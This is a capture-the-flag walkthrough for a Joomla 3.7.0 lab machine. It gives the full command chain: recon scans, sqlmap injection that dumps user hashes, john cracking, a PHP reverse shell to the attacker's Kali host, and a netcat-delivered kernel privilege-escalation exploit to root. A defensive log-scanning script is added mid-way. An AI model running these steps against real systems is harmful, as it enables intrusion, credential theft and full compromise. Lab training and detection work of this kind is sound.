Scan to find the target IP address: 192.168.67.72
nmap -sn 192.168.67.0/24

Scan for the operating system and open ports: http
nmap -A -p- 192.168.67.72

View the page: http://192.168.67.72
Got the flag:

This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge. :-)

Wappalyzer shows that the site runs Joomla.
Scanning with joomscan gives the Joomla version: 3.7.0
joomscan -u http://192.168.67.72

Check whether this version has an exploitable vulnerability; one page in this version turns out to have a SQL injection vulnerability:
searchsploit joomla 3.7.0

Make a copy of the exploit:
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /root/joomla.txt

View it:
more joomla.txt

Run sqlmap:
Get the databases:
sqlmap -u "http://192.168.67.72/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Get the tables:
sqlmap -u "http://192.168.67.72/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

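Get the columns (the table name must be quoted, otherwise the shell treats everything from # onward as a comment):
sqlmap -u "http://192.168.67.72/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns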

Get the usernames and passwords:
sqlmap -u "http://192.168.67.72/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C "username,password" --dump

Username obtained: admin
Password obtained: $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
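
On the defending side, the sqlmap runs above leave a recognizable trace in the web server access log, and because --random-agent is used the User-Agent is no help in spotting them. The following is an added example, not part of the original walkthrough: it flags com_fields requests whose list[fullordering] value is not a plain ordering value. The log lines are constructed, and the "column [ASC|DESC]" allow-list is an assumption about what legitimate values look like.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Combined log format: only the client IP and the request target are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')

# Assumption: a legitimate ordering value is "column" or "column ASC|DESC".
SAFE_ORDERING = re.compile(r'^[A-Za-z0-9_.]+( (asc|desc))?$', re.IGNORECASE)

def suspicious_ordering(line):
    """Return (ip, decoded value) for a com_fields request whose
    list[fullordering] is not a plain ordering value, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs percent-decodes names and values, so list%5Bfullordering%5D
    # and list[fullordering] are treated the same.
    query = parse_qs(urlsplit(m.group("target")).query)
    if "com_fields" not in query.get("option", []):
        return None
    for value in query.get("list[fullordering]", []):
        if not SAFE_ORDERING.match(value.strip()):
            return m.group("ip"), value
    return None

def scan(lines):
    """Count suspicious com_fields requests per client IP."""
    hits = Counter()
    for line in lines:
        hit = suspicious_ordering(line)
        if hit:
            hits[hit[0]] += 1
    return hits

# Constructed sample log lines (not taken from the target machine).
SAMPLE_LOG = [
    '192.168.67.50 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.67.79 - - [01/Jan/2020:10:00:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%281%2C2%2C3%29 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '192.168.67.79 - - [01/Jan/2020:10:00:06 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,2,3) HTTP/1.1" 500 312 "-" "Opera/9.80"',
    '192.168.67.50 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 7301 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, count in scan(SAMPLE_LOG).items():
        print(f"{ip}: {count} suspicious list[fullordering] request(s)")
```

A single bare word such as updatexml still passes this allow-list, so on a real site SAFE_ORDERING is better replaced by the exact set of column names the application uses.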

Save the password to pwd.txt
Crack the hash with john to get the password: snoopy
john pwd.txt
john --show pwd.txt

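Log in at http://192.168.67.72/administrator. Joomla allows PHP pages to be uploaded or modified under Extensions --> Templates --> Templates; here Beez3 Details and Files was chosen [any template works], then a reverse shell is put in place by modifying or uploading a page.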
cp /usr/share/webshells/php/php-reverse-shell.php /root/reverse.php
Change the address the shell connects back to so that it points at Kali: 192.168.67.79, then copy it into index.php
Listen on port 4444 on Kali:
nc -vnlp 4444
Open 192.168.67.72/templates/beez3/index.php in the browser to get the reverse shell
pwd
whoami

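The shell is not running as root, so escalate privileges; the natural first thing to try is checking whether the system itself has a vulnerability:
View the kernel information: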
uname -a
View the system version information:
cat /etc/issue
cat /proc/version
System version: Ubuntu 16.04
Kernel: 4.4.0-21-generic

searchsploit ubuntu 16.04 4.4
Use: Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root/39772.txt
vim 39772.txt

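The end of the file points to https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip for the download, but it is so old that it has since been refreshed, so we can search GitHub for ebpf_mapfd_doubleput_exploit-master and download it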

Unpack ebpf_mapfd_doubleput_exploit-master, then transfer it with nc
On Kali:
tar -zcvf - ebpf_mapfd_doubleput_exploit-master/ | nc -lp 3334
In the shell:
nc 192.168.67.79 3334 | tar -zxvf -
Look at the usage example in 39772.txt, then in the shell:
./compile.sh
./doubleput
cd /root
ls
cat the-flag.txt

__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)

Congratulations are in order. :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

Takeaways: information gathering, password cracking, vulnerability exploitation, transferring files with netcat, privilege escalation